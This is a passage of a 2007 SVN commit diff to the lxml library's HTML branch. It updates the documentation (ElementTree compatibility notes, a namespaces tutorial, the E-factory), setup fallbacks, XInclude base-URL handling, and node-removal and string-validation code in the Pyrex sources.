exception. -* When parsing fails in ``iterparse()``, ElementTree raises an ExpatError - instead of a SyntaxError. lxml.etree follows the other parts of the parser - API and raises an (XML)SyntaxError. +* When parsing fails in ``iterparse()``, ElementTree raises a low-level + ExpatError instead of a SyntaxError as the other parsers. lxml.etree + follows the other parts of the parser API and raises an (XML)SyntaxError. * The ``iterparse()`` function in lxml is implemented based on the libxml2 - parser. This means that modifications of the document root or the ancestors - of the current element during parsing can irritate the parser and even - segfault. While this is not a problem in the Python object structure used - by ElementTree, the C tree underlying lxml suffers from it. The golden rule - for ``iterparse()`` on lxml therefore is: do not touch anything that will - have to be touched again by the parser later on. See the lxml API - documentation on this. + parser and tree generator. This means that modifications of the document + root or the ancestors of the current element during parsing can irritate the + parser and even segfault. While this is not a problem in the Python object + structure used by ElementTree, the C tree underlying lxml suffers from it. + The golden rule for ``iterparse()`` on lxml therefore is: do not touch + anything that will have to be touched again by the parser later on. See the + lxml parser documentation on this. * ElementTree ignores comments and processing instructions when parsing XML, while etree will read them in and treat them as Comment or - ProcessingInstruction elements respectively. + ProcessingInstruction elements respectively. This is especially visible + where comments are found inside text content, which is then split by the + Comment element. You can disable this behaviour by passing the boolean + ``remove_comments`` keyword argument to the parser you use. * ElementTree has a bug when serializing an empty Comment (no text argument given) to XML, etree serializes this successfully. @@ -113,18 +118,19 @@ * ElementTree merges the target of a processing instruction into ``PI.text``, while lxml.etree puts it into the ``.target`` property and leaves it out of - the ``.text`` property. + the ``.text`` property. The ``pi.text`` in ElementTree therefore + correspondents to ``pi.target + " " + pi.text`` in lxml.etree. * Because etree is built on top of libxml2, which is namespace prefix aware, etree preserves namespaces declarations and prefixes while ElementTree tends to come up with its own prefixes (ns0, ns1, etc). When no namespace prefix - is given however, etree creates ElementTree style prefixes as well. + is given, however, etree creates ElementTree style prefixes as well. * etree has a 'prefix' attribute (read-only) on elements giving the Element's prefix, if this is known, and None otherwise (in case of no namespace at all, or default namespace). - etree further allows passing an 'nsmap' dictionary to the Element and +* etree further allows passing an 'nsmap' dictionary to the Element and SubElement element factories to explicitly map namespace prefixes to namespace URIs. These will be translated into namespace declarations on that element. This means that in the probably rare case that you need to @@ -132,13 +138,9 @@ ElementTree, you cannot pass it as a keyword argument to the Element and SubElement factories directly. -* etree elements can be copied using copy.deepcopy() and copy.copy(), just - like ElementTree's. copy.copy() however does *not* create a shallow copy - where elements are shared between trees, as this makes no sense in the - context of libxml2 trees. Note that lxml can deep-copy trees considerably - faster than ElementTree. - -* etree allows navigation to the parent of a node by the ``getparent()`` - method and to the siblings by calling ``getnext()`` and ``getprevious()``. - This is not possible in ElementTree as the underlying tree model does not - have this information. +* etree elements can be copied using ``copy.deepcopy()`` and ``copy.copy()``, + just like ElementTree's. However, ``copy.copy()`` does *not* create a + shallow copy where elements are shared between trees, as this makes no sense + in the context of libxml2 trees. Note that lxml can deep-copy trees + considerably faster than ElementTree, so a deep copy might still be fast + enough to replace a shallow copy in your case. Modified: lxml/branch/html/doc/html/style.css ============================================================================== --- lxml/branch/html/doc/html/style.css (original) +++ lxml/branch/html/doc/html/style.css Fri Jun 29 19:05:43 2007 @@ -205,6 +205,12 @@ font-style: italic; } +div.line-block { + font-family: Times, "Times New Roman", serif; + text-align: center; + font-size: 140%; +} + code { color: Black; background-color: #cccccc; Modified: lxml/branch/html/doc/intro.txt ============================================================================== --- lxml/branch/html/doc/intro.txt (original) +++ lxml/branch/html/doc/intro.txt Fri Jun 29 19:05:43 2007 @@ -14,21 +14,20 @@ To explain the motto: -"Programming with libxml2 is like the thrilling embrace of an exotic -stranger. It seems to have the potential to fulfill your wildest -dreams, but there's a nagging voice somewhere in your head warning you -that you're about to get screwed in the worst way." (`a quote by Mark -Pilgrim`_) - -Mark Pilgrim was describing in particular the experience a Python -programmer has when dealing with libxml2. libxml2's default Python -bindings are fast, thrilling, powerful, and your code might fail in -some horrible way that you really shouldn't have to worry about when -writing Python code. lxml tries to combine the power of libxml2 with -the ease of use of Python. +"Programming with libxml2 is like the thrilling embrace of an exotic stranger. +It seems to have the potential to fulfill your wildest dreams, but there's a +nagging voice somewhere in your head warning you that you're about to get +screwed in the worst way." (`a quote by Mark Pilgrim`_) + +Mark Pilgrim was describing in particular the experience a Python programmer +has when dealing with libxml2. The default Python bindings of libxml2 are +fast, thrilling, powerful, and your code might fail in some horrible way that +you really shouldn't have to worry about when writing Python code. lxml +combines the power of libxml2 with the ease of use of Python. .. _`a quote by Mark Pilgrim`: http://diveintomark.org/archives/2004/02/18/libxml2 + Aims ---- @@ -36,6 +35,8 @@ * Standards-compliant XML support. +* Support for (broken) HTML. + * Full-featured. * Actively maintained by XML experts. @@ -46,8 +47,9 @@ .. _libxslt: http://xmlsoft.org/XSLT -These libraries already ship with Python bindings, but these Python -bindings have problems. In particular: + +These libraries already ship with Python bindings, but these Python bindings +mimic the C-level interface. This yields a number of problems: * very low level and C-ish (not Pythonic). @@ -55,12 +57,13 @@ * UTF-8 in API, instead of Python unicode strings. -* can cause segfaults from Python. +* Can easily cause segfaults from Python. + +* Require manual memory management! -* have to do manual memory management! -lxml is a new Python binding for libxml2 and libxslt, completely -independent from these existing Python bindings. Its aim: +lxml is a new Python binding for libxml2 and libxslt, completely independent +from these existing Python bindings. Its aims: * Pythonic API. @@ -72,9 +75,8 @@ * No manual memory management! -lxml aims to provide a Pythonic API by following as much as possible -the `ElementTree API`_. We're trying to avoid having to invent too -many new APIs, or you having to learn new things -- XML is complicated -enough. +lxml aims to provide a Pythonic API by following as much as possible the +`ElementTree API`_. We're trying to avoid inventing too many new APIs, or you +having to learn new things -- XML is complicated enough. .. _`ElementTree API`: http://effbot.org/zone/element-index.htm Modified: lxml/branch/html/doc/main.txt ============================================================================== --- lxml/branch/html/doc/main.txt (original) +++ lxml/branch/html/doc/main.txt Fri Jun 29 19:05:43 2007 @@ -1,7 +1,15 @@ lxml ==== -.. contents:: +.. meta:: + :description: lxml - the most feature-rich and easy-to-use library for working with XML and HTML in the Python language + :keywords: lxml, etree, objectify, Python, XML, HTML + +| lxml is the most feature-rich +| and easy-to-use library +| for working with XML and HTML +| in the Python language. + .. 1 Introduction 2 Documentation @@ -14,9 +22,11 @@ Introduction ------------ -lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. See the -introduction_ for more information about background and goals. Some common -questions are answered in the FAQ_. +lxml is a Pythonic binding for the libxml2_ and libxslt_ libraries. It is +unique in that it combines the speed and feature completeness of these +libraries with the simplicity of a native Python API. See the introduction_ +for more information about background and goals. Some common questions are +answered in the FAQ_. .. _libxml2: http://xmlsoft.org .. _libxslt: http://xmlsoft.org/XSLT @@ -119,11 +129,9 @@ .. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ .. _`this key`: pubkey.asc -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +The latest version is `lxml 1.3`_, released 2007-06-24 (`changes for 1.3`_). `Older versions`_ are listed below. -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html .. _`Older versions`: #old-versions Please take a look at the `installation instructions`_! @@ -150,16 +158,23 @@ Questions? Suggestions? Code to contribute? We have a `mailing list`_. +You can search the archive with Gmane_ or Google_. + .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _Gmane: http://blog.gmane.org/gmane.comp.python.lxml.devel +.. _Google: http://www.google.com/webhp?q=site:codespeak.net/mailman/listinfo/lxml-dev%20 License ------- -The lxml library is shipped under a BSD license. libxml2 and libxslt2 -itself are shipped under the MIT license. There should therefore be no +The lxml library is shipped under a `BSD license`_. libxml2 and libxslt2 +itself are shipped under the `MIT license`_. There should therefore be no obstacle to using lxml in your codebase. +.. _`BSD license`: http://codespeak.net/svn/lxml/trunk/doc/licenses/BSD.txt +.. _`MIT license`: http://www.opensource.org/licenses/mit-license.html + Old Versions ------------ @@ -200,6 +215,7 @@ * `lxml 0.5`_, released 2005-04-08 +.. _`lxml 1.3`: lxml-1.3.tgz .. _`lxml 1.2.1`: lxml-1.2.1.tgz .. _`lxml 1.2`: lxml-1.2.tgz .. _`lxml 1.1.2`: lxml-1.1.2.tgz @@ -219,6 +235,7 @@ .. _`lxml 0.5.1`: lxml-0.5.1.tgz .. _`lxml 0.5`: lxml-0.5.tgz +.. _`CHANGES for 1.3`: changes-1.3.html .. _`changes for 1.2.1`: changes-1.2.1.html .. _`changes for 1.2`: changes-1.2.html .. _`changes for 1.1.2`: changes-1.1.2.html Modified: lxml/branch/html/doc/objectify.txt ============================================================================== --- lxml/branch/html/doc/objectify.txt (original) +++ lxml/branch/html/doc/objectify.txt Fri Jun 29 19:05:43 2007 @@ -267,6 +267,28 @@ notB +Tree generation with the E-factory +---------------------------------- + +To simplify the generation of trees even further, you can use the E-factory:: + + >>> E = objectify.E + >>> root = E.root( + ... E.a(5), + ... E.b(6.1), + ... E.c(True), + ... E.d("how", tell="me") + ... ) + + >>> print etree.tostring(root, pretty_print=True) + + 5 + 6.1 + true + how + + + Namespace handling ------------------ Modified: lxml/branch/html/doc/parsing.txt ============================================================================== --- lxml/branch/html/doc/parsing.txt (original) +++ lxml/branch/html/doc/parsing.txt Fri Jun 29 19:05:43 2007 @@ -1,9 +1,10 @@ -===================== -Parsing XML with lxml -===================== - -lxml provides a very simple and powerful API for parsing XML. It supports -one-step parsing as well as step-by-step parsing using an event-driven API. +============================== +Parsing XML and HTML with lxml +============================== + +lxml provides a very simple and powerful API for parsing XML and HTML. It +supports one-step parsing as well as step-by-step parsing using an +event-driven API (currently only for XML). .. contents:: .. @@ -64,6 +65,10 @@ * remove_blank_text - discard blank text nodes between tags +* remove_comments - discard comments + +* compact - use compact storage for short text content (on by default) + Parsing HTML ------------ Modified: lxml/branch/html/doc/performance.txt ============================================================================== --- lxml/branch/html/doc/performance.txt (original) +++ lxml/branch/html/doc/performance.txt Fri Jun 29 19:05:43 2007 @@ -466,8 +466,11 @@ Since then, lxml has matured a lot and has gotten much faster. The iterparse variant now runs in 0.14 seconds, and if you remove the ``v.clear()``, it is -even a little faster (which isn't the case for cElementTree). When you move -the whole thing to a pure XPath implementation, it will look like this:: +even a little faster (which isn't the case for cElementTree). + +One of the many great tools in lxml is XPath, a swiss army knife for finding +things in XML documents. It is possible to move the whole thing to a pure +XPath implementation, which looks like this:: def bench_lxml_xpath_all(): tree = etree.parse("ot.xml") @@ -523,6 +526,11 @@ started with ``getiterator("v")`` or ``iterparse()``. Either of them would already have been the most efficient, depending on which library is used. +* It's important to know your tool. lxml and cElementTree are both very fast + libraries, but they do not have the same performance characteristics. The + fastest solution in one library can be comparatively slow in the other. If + you optimise, optimise for the specific target platform. + * It's not always worth optimising. After all that hassle we got from 0.12 seconds for the initial implementation to 0.11 seconds. Switching over to cElementTree and writing an ``iterparse()`` based version would have given Modified: lxml/branch/html/doc/tutorial.txt ============================================================================== --- lxml/branch/html/doc/tutorial.txt (original) +++ lxml/branch/html/doc/tutorial.txt Fri Jun 29 19:05:43 2007 @@ -31,8 +31,8 @@ >>> from lxml import etree If your code only uses the ElementTree API and does not rely on any -functionality that is specific to ``lxml.etree``, you can also use the -following import chain as a fall-back to the original ElementTree:: +functionality that is specific to ``lxml.etree``, you can also use (any part +of) the following import chain as a fall-back to the original ElementTree:: try: from lxml import etree @@ -108,7 +108,7 @@ ------------------ To make the access to these subelements as easy and straight forward as -possible, elements behave exactly like normal Python lists:: +possible, elements behave like normal Python lists:: >>> child = root[0] >>> print child.tag @@ -133,7 +133,7 @@ >>> print end[0].tag child3 - >>> root[0] = root[-1] + >>> root[0] = root[-1] # this moves the element! >>> for child in root: ... print child.tag child3 @@ -239,9 +239,9 @@ >>> print etree.tostring(root) TEXT -In many XML documents (so-called *data-centric* documents), this is the only -place where text can be found. It is encapsulated by a leaf tag at the very -bottom of the tree hierarchy. +In many XML documents (*data-centric* documents), this is the only place where +text can be found. It is encapsulated by a leaf tag at the very bottom of the +tree hierarchy. However, if XML is used for tagged text documents such as (X)HTML, text can also appear between different elements, right in the middle of the tree:: @@ -249,9 +249,9 @@ Hello
World Here, the ``
`` tag is surrounded by text. This is often referred to as -*document-style* XML. Elements support this through their ``tail`` property. -It contains the text that directly follows the element, up to the next element -in the XML tree:: +*document-style* or *mixed-content* XML. Elements support this through their +``tail`` property. It contains the text that directly follows the element, up +to the next element in the XML tree:: >>> html = etree.Element("html") >>> body = etree.SubElement(html, "body") @@ -280,8 +280,8 @@ If you want to use this more often, you can wrap it in a function:: - >>> buildTextList = etree.XPath("//text()") # lxml.etree only! - >>> print buildTextList(html) + >>> build_text_list = etree.XPath("//text()") # lxml.etree only! + >>> print build_text_list(html) ['TEXT', 'TAIL'] .. _XPath: xpathxslt.html#xpath @@ -344,9 +344,148 @@ The parse() function -------------------- + Namespaces ========== +The ElementTree API avoids `namespace prefixes`_ wherever possible and deploys +the real namespaces instead:: + + >>> xhtml = etree.Element("{http://www.w3.org/1999/xhtml}html") + >>> body = etree.SubElement(xhtml, "{http://www.w3.org/1999/xhtml}body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +.. _`namespace prefixes`: http://www.w3.org/TR/xml-names/#ns-qualnames + +As you can see, prefixes only become important when you serialise the result. +However, the above code becomes somewhat verbose due to the lengthy namespace +names. And retyping or copying a string over and over again is error prone. +It is therefore common practice to store a namespace URI in a global variable. +To adapt the namespace prefixes for serialisation, you can also pass a mapping +to the Element factory, e.g. to define the default namespace:: + + >>> XHTML_NAMESPACE = "http://www.w3.org/1999/xhtml" + >>> XHTML = "{%s}" % XHTML_NAMESPACE + + >>> NSMAP = {None : XHTML_NAMESPACE} # the default namespace (no prefix) + + >>> xhtml = etree.Element(XHTML + "html", nsmap=NSMAP) # lxml only! + >>> body = etree.SubElement(xhtml, XHTML + "body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +Namespaces on attributes work alike:: + + >>> body.set(XHTML + "bgcolor", "#CCFFAA") + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + + >>> print body.get("bgcolor") + None + >>> body.get(XHTML + "bgcolor") + '#CCFFAA' + +You can also use XPath in this way:: + + >>> find_xhtml_body = etree.ETXPath( # lxml only ! + ... "//{%s}body" % XHTML_NAMESPACE) + >>> results = find_xhtml_body(xhtml) + + >>> print results[0].tag + {http://www.w3.org/1999/xhtml}body + + +The E-factory +============= + +The ``E-factory`` provides a simple and compact syntax for generating XML and +HTML:: + + >>> from lxml.builder import E + + >>> def CLASS(*args): # class is a reserved word in Python + ... return {"class":' '.join(args)} + + >>> html = page = ( + ... E.html( # create an Element called "html" + ... E.head( + ... E.title("This is a sample document") + ... ), + ... E.body( + ... E.h1("Hello!", CLASS("title")), + ... E.p("This is a paragraph with ", E.b("bold"), " text in it!"), + ... E.p("This is another paragraph, with a ", + ... E.a("link", href="http://www.python.org"), "."), + ... E.p("Here are some reservered characters: ."), + ... etree.XML("

And finally an embedded XHTML fragment.

"), + ... ) + ... ) + ... ) + + >>> print etree.tostring(page, pretty_print=True) + + + This is a sample document + + +

Hello!

+

This is a paragraph with bold text in it!

+

This is another paragraph, with a link.

+

Here are some reservered characters: <spam&egg>.

+

And finally an embedded XHTML fragment.

+ + + +The Element creation based on attribute access makes it easy to build up a +simple vocabulary for an XML language:: + + >>> DOC = E.doc + >>> TITLE = E.title + >>> SECTION = E.section + >>> PAR = E.par + + >>> my_doc = DOC( + ... TITLE("The dog and the hog"), + ... SECTION( + ... TITLE("The dog"), + ... PAR("Once upon a time, ..."), + ... PAR("And then ...") + ... ), + ... SECTION( + ... TITLE("The hog"), + ... PAR("Sooner or later ...") + ... ) + ... ) + + >>> print etree.tostring(my_doc, pretty_print=True) + + The dog and the hog +
+ The dog + Once upon a time, ... + And then ... +
+
+ The hog + Sooner or later ... +
+
+ +One such example is the module ``lxml.html.builder``, which provides a +vocabulary for HTML. + ElementPath =========== Modified: lxml/branch/html/setup.py ============================================================================== --- lxml/branch/html/setup.py (original) +++ lxml/branch/html/setup.py Fri Jun 29 19:05:43 2007 @@ -1,12 +1,21 @@ -from ez_setup import use_setuptools -use_setuptools(version="0.5") - -from setuptools import setup import sys, os -# need to insert this to python path so we're sure we can import -# versioninfo and setupinfo even if we start setup.py from another -# location (such as a buildout) +try: + try: + import pkg_resources + pkg_resources.require("setuptools>=0.6c5") + except pkg_resources.VersionConflict, e: + from ez_setup import use_setuptools + use_setuptools(version="0.6c5") + raise ImportError + from setuptools import setup +except ImportError: + # not setuptools installed + from distutils.core import setup + +# need to insert this to python path so we're sure we can import versioninfo, +# setupinfo and Pyrex (!) even if we start setup.py from another location +# (such as a buildout) sys.path.insert(0, os.path.dirname(__file__)) import versioninfo Modified: lxml/branch/html/setupinfo.py ============================================================================== --- lxml/branch/html/setupinfo.py (original) +++ lxml/branch/html/setupinfo.py Fri Jun 29 19:05:43 2007 @@ -1,5 +1,8 @@ import sys, os -from setuptools.extension import Extension +try: + from setuptools.extension import Extension +except ImportError: + from distutils.extension import Extension try: from Pyrex.Distutils import build_ext as build_pyx Modified: lxml/branch/html/src/lxml/ElementInclude.py ============================================================================== --- lxml/branch/html/src/lxml/ElementInclude.py (original) +++ lxml/branch/html/src/lxml/ElementInclude.py Fri Jun 29 19:05:43 2007 @@ -46,6 +46,8 @@ ## import copy, etree +from urlparse import urljoin +from urllib2 import urlopen try: set @@ -95,7 +97,12 @@ if parse == "xml": data = etree.parse(href, parser).getroot() else: - data = open(href).read() + if "://" in href: + f = urlopen(href) + else: + f = open(href) + data = f.read() + f.close() if encoding: data = data.decode(encoding) return data @@ -121,15 +128,20 @@ # @throws IOError If the function fails to load a given resource. # @returns the node or its replacement if it was an XInclude node -def include(elem, loader=None): - if hasattr(elem, 'getroot'): - #if hasattr(elem, 'docinfo'): - # base_url = elem.docinfo.URL - _include(elem.getroot(), loader) - else: - _include(elem, loader) +def include(elem, loader=None, base_url=None): + if base_url is None: + if hasattr(elem, 'getroot'): + tree = elem + elem = elem.getroot() + else: + tree = elem.getroottree() + if hasattr(tree, 'docinfo'): + base_url = tree.docinfo.URL + elif hasattr(elem, 'getroot'): + elem = elem.getroot() + _include(elem, loader, base_url=base_url) -def _include(elem, loader=None, _parent_hrefs=None): +def _include(elem, loader=None, _parent_hrefs=None, base_url=None): if loader is not None: load_include = _wrap_et_loader(loader) else: @@ -146,7 +158,7 @@ for e in include_elements: if e.tag == XINCLUDE_INCLUDE: # process xinclude directive - href = e.get("href") + href = urljoin(base_url, e.get("href")) parse = e.get("parse", "xml") parent = e.getparent() if parse == "xml": Modified: lxml/branch/html/src/lxml/apihelpers.pxi ============================================================================== --- lxml/branch/html/src/lxml/apihelpers.pxi (original) +++ lxml/branch/html/src/lxml/apihelpers.pxi Fri Jun 29 19:05:43 2007 @@ -459,6 +459,8 @@ * its name string equals the c_name string """ cdef char* c_node_href + if c_node is NULL: + return 0 if c_node.type != tree.XML_ELEMENT_NODE: # not an element, only succeed if we match everything return c_name is NULL and c_href is NULL @@ -485,11 +487,17 @@ else: return 0 -cdef void _removeNode(xmlNode* c_node): - """Unlink and free a node and subnodes if possible. +cdef void _removeNode(_Document doc, xmlNode* c_node): + """Unlink and free a node and subnodes if possible. Otherwise, make sure + it's self-contained. """ + cdef xmlNode* c_next + c_next = c_node.next tree.xmlUnlinkNode(c_node) - attemptDeallocation(c_node) + _moveTail(c_next, c_node) + if not attemptDeallocation(c_node): + # make namespaces absolute + moveNodeToDocument(doc, c_node) cdef void _moveTail(xmlNode* c_tail, xmlNode* c_target): cdef xmlNode* c_next @@ -517,7 +525,8 @@ c_target = c_new_tail c_tail = _textNodeOrSkip(c_tail.next) -cdef xmlNode* _deleteSlice(xmlNode* c_node, Py_ssize_t start, Py_ssize_t stop): +cdef xmlNode* _deleteSlice(_Document doc, xmlNode* c_node, + Py_ssize_t start, Py_ssize_t stop): """Delete slice, starting with c_node, start counting at start, end at stop. """ cdef xmlNode* c_next @@ -529,9 +538,9 @@ while c_node is not NULL and c < stop: c_next = c_node.next if _isElement(c_node): - _removeText(c_node.next) - c_next = c_node.next - _removeNode(c_node) + while c_next is not NULL and not _isElement(c_next): + c_next = c_next.next + _removeNode(doc, c_node) c = c + 1 c_node = c_next return c_node @@ -550,7 +559,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(child, parent._doc) + moveNodeToDocument(parent._doc, c_node) cdef void _appendSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -566,7 +575,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef void _prependSibling(_Element element, _Element sibling): """Append a new child to a parent element. @@ -582,7 +591,7 @@ _moveTail(c_next, c_node) # uh oh, elements may be pointing to different doc when # parent element has moved; change them too.. - moveNodeToDocument(sibling, element._doc) + moveNodeToDocument(element._doc, c_node) cdef int isutf8(char* s): cdef char c @@ -598,16 +607,20 @@ cdef char* s cdef char* c_end cdef char c + cdef int is_non_ascii s = _cstr(pystring) c_end = s + python.PyString_GET_SIZE(pystring) + is_non_ascii = 0 while s < c_end: c = s[0] - if c == c'\0': - return -1 # invalid! if c & 0x80: - return 1 # non-ASCII + is_non_ascii = 1 + elif c == c'\0': + return -1 # invalid! + elif is_non_ascii == 0 and not tree.xmlIsChar_ch(c): + return -1 # invalid! s = s + 1 - return 0 # plain 7-bit ASCII + return is_non_ascii cdef object funicode(char* s): cdef Py_ssize_t slen @@ -628,12 +641,15 @@ cdef object _utf8(object s): if python.PyString_Check(s): assert not isutf8py(s), \ - "All strings must be Unicode or ASCII" - return s + "All strings must be XML compatible, either Unicode or ASCII" elif python.PyUnicode_Check(s): - return python.PyUnicode_AsUTF8String(s) + # FIXME: we should test these strings, too ... + s = python.PyUnicode_AsUTF8String(s) + assert isutf8py(s) != -1, \ + "All strings must be XML compatible, either Unicode or ASCII" else: raise TypeError, "Argument must be string or unicode." + return s cdef object _encodeFilename(object filename): if filename is None: Modified: lxml/branch/html/src/lxml/builder.py ============================================================================== --- lxml/branch/html/src/lxml/builder.py (original) +++ lxml/branch/html/src/lxml/builder.py Fri Jun 29 19:05:43 2007 @@ -1,10 +1,37 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" +# +# Element generator factory by Fredrik Lundh. +# +# Source: +# http://online.effbot.org/2006_11_01_archive.htm#et-builder +# http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py +# +# -------------------------------------------------------------------- +# The ElementTree toolkit is +# +# Copyright (c) 1999-2004 by Fredrik Lundh +# +# By obtaining, using, and/or copying this software and/or its +# associated documentation, you agree that you have read, understood, +# and will comply with the following terms and conditions: +# +# Permission to use, copy, modify, and distribute this software and +# its associated documentation for any purpose and without fee is +# hereby granted, provided that the above copyright notice appears in +# all copies, and that both that copyright notice and this permission +# notice appear in supporting documentation, and that the name of +# Secret Labs AB or the author not be used in advertising or publicity +# pertaining to distribution of the software without specific, written +# prior permission. +# +# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD +# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT- +# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR +# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY +# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, +# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS +# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE +# OF THIS SOFTWARE. +# -------------------------------------------------------------------- import etree as ET @@ -113,7 +140,10 @@ elem[-1].tail = (elem[-1].tail or "") + item else: elem.text = (elem.text or "") + item - typemap[str] = typemap[unicode] = add_text + if str not in typemap: + typemap[str] = add_text + if unicode not in typemap: + typemap[unicode] = add_text def add_dict(elem, item): attrib = elem.attrib @@ -122,7 +152,8 @@ attrib[k] = v else: attrib[k] = typemap[type(v)](None, v) - typemap[dict] = add_dict + if dict not in typemap: + typemap[dict] = add_dict self._typemap = typemap Modified: lxml/branch/html/src/lxml/etree.pyx ============================================================================== --- lxml/branch/html/src/lxml/etree.pyx (original) +++ lxml/branch/html/src/lxml/etree.pyx Fri Jun 29 19:05:43 2007 @@ -243,8 +243,8 @@ #displayNode(self._c_doc, 0) #print self._c_doc, self._c_doc.dict is __GLOBAL_PARSER_CONTEXT._c_dict #print self._c_doc, canDeallocateChildNodes(self._c_doc) - #tree.xmlFreeDoc(c_doc) - _deallocDocument(self._c_doc) + tree.xmlFreeDoc(self._c_doc) + #_deallocDocument(self._c_doc) cdef getroot(self): cdef xmlNode* c_node @@ -453,8 +453,9 @@ _removeText(c_node.next) tree.xmlReplaceNode(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) - attemptDeallocation(c_node) + moveNodeToDocument(self._doc, element._c_node) + if not attemptDeallocation(c_node): + moveNodeToDocument(self._doc, c_node) def __delitem__(self, Py_ssize_t index): """Deletes the given subelement. @@ -464,14 +465,14 @@ if c_node is NULL: raise IndexError, index _removeText(c_node.next) - _removeNode(c_node) + _removeNode(self._doc, c_node) def __delslice__(self, Py_ssize_t start, Py_ssize_t stop): """Deletes a number of subelements. """ cdef xmlNode* c_node c_node = _findChild(self._c_node, start) - _deleteSlice(c_node, start, stop) + _deleteSlice(self._doc, c_node, start, stop) def __setslice__(self, Py_ssize_t start, Py_ssize_t stop, value): """Replaces a number of subelements with elements @@ -486,8 +487,8 @@ else: c_node = _findChild(self._c_node, start) # now delete the slice - if start != stop: - c_node = _deleteSlice(c_node, start, stop) + if c_node is not NULL and start != stop: + c_node = _deleteSlice(self._doc, c_node, start, stop) # if the insertion point is at the end, append there if c_node is NULL: for element in value: @@ -500,12 +501,11 @@ # store possible text tail c_next = element._c_node.next # now move node previous to insertion point - tree.xmlUnlinkNode(element._c_node) tree.xmlAddPrevSibling(c_node, element._c_node) # and move tail just behind his node _moveTail(c_next, element._c_node) # move it into a new document - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def __deepcopy__(self, memo): return self.__copy__() @@ -597,9 +597,9 @@ while c_node is not NULL: c_node_next = c_node.next if _isElement(c_node): - _removeText(c_node_next) - c_node_next = c_node.next - _removeNode(c_node) + while c_node_next is not NULL and not _isElement(c_node_next): + c_node_next = c_node_next.next + _removeNode(self._doc, c_node) c_node = c_node_next def insert(self, index, _Element element not None): @@ -614,7 +614,7 @@ c_next = element._c_node.next tree.xmlAddPrevSibling(c_node, element._c_node) _moveTail(c_next, element._c_node) - moveNodeToDocument(element, self._doc) + moveNodeToDocument(self._doc, element._c_node) def remove(self, _Element element not None): """Removes a matching subelement. Unlike the find methods, this @@ -629,6 +629,8 @@ c_next = element._c_node.next tree.xmlUnlinkNode(c_node) _moveTail(c_next, c_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_node) def replace(self, _Element old_element not None, _Element new_element not None): @@ -647,7 +649,9 @@ tree.xmlReplaceNode(c_old_node, c_new_node) _moveTail(c_new_next, c_new_node) _moveTail(c_old_next, c_old_node) - moveNodeToDocument(new_element, self._doc) + moveNodeToDocument(self._doc, c_new_node) + # fix namespace declarations + moveNodeToDocument(self._doc, c_old_node) # PROPERTIES property tag: @@ -1424,7 +1428,7 @@ FTP. Note that XInclude does not support custom resolvers in Python space - due to restrictions of libxml2 <= 2.6.28. + due to restrictions of libxml2 <= 2.6.29. """ cdef python.PyThreadState* state cdef int result @@ -1496,10 +1500,11 @@ if python.PyTuple_GET_SIZE(default) == 0: raise KeyError, key else: - return python.PyTuple_GET_ITEM(default, 0) + result = python.PyTuple_GET_ITEM(default, 0) + python.Py_INCREF(result) else: _delAttribute(self._element, key) - return result + return result def clear(self): cdef xmlNode* c_node Modified: lxml/branch/html/src/lxml/iterparse.pxi ============================================================================== --- lxml/branch/html/src/lxml/iterparse.pxi (original) +++ lxml/branch/html/src/lxml/iterparse.pxi Fri Jun 29 19:05:43 2007 @@ -3,7 +3,7 @@ cdef object __ITERPARSE_CHUNK_SIZE __ITERPARSE_CHUNK_SIZE = 32768 -ctypedef enum IterparseEventFilter: +ctypedef enum _IterparseEventFilter: ITERPARSE_FILTER_START = 1 ITERPARSE_FILTER_END = 2 ITERPARSE_FILTER_START_NS = 4 @@ -234,13 +234,15 @@ * load_dtd - use DTD for parsing * no_network - prevent network access * remove_blank_text - discard blank text nodes + * remove_comments - discard comments """ cdef object _source cdef object _filename cdef readonly object root def __init__(self, source, events=("end",), tag=None, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, remove_blank_text=False): + load_dtd=False, no_network=False, remove_blank_text=False, + remove_comments=False): cdef _IterparseContext context cdef char* c_filename cdef int parse_options @@ -257,7 +259,7 @@ c_filename = NULL self._source = source - _BaseParser.__init__(self, _IterparseContext) + _BaseParser.__init__(self, remove_comments, _IterparseContext) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: Modified: lxml/branch/html/src/lxml/objectify.pyx ============================================================================== --- lxml/branch/html/src/lxml/objectify.pyx (original) +++ lxml/branch/html/src/lxml/objectify.pyx Fri Jun 29 19:05:43 2007 @@ -65,6 +65,8 @@ cdef object islice from itertools import islice +cdef object _ElementMaker +from builder import ElementMaker as _ElementMaker # namespace/name for "pytype" hint attribute cdef object PYTYPE_NAMESPACE @@ -759,7 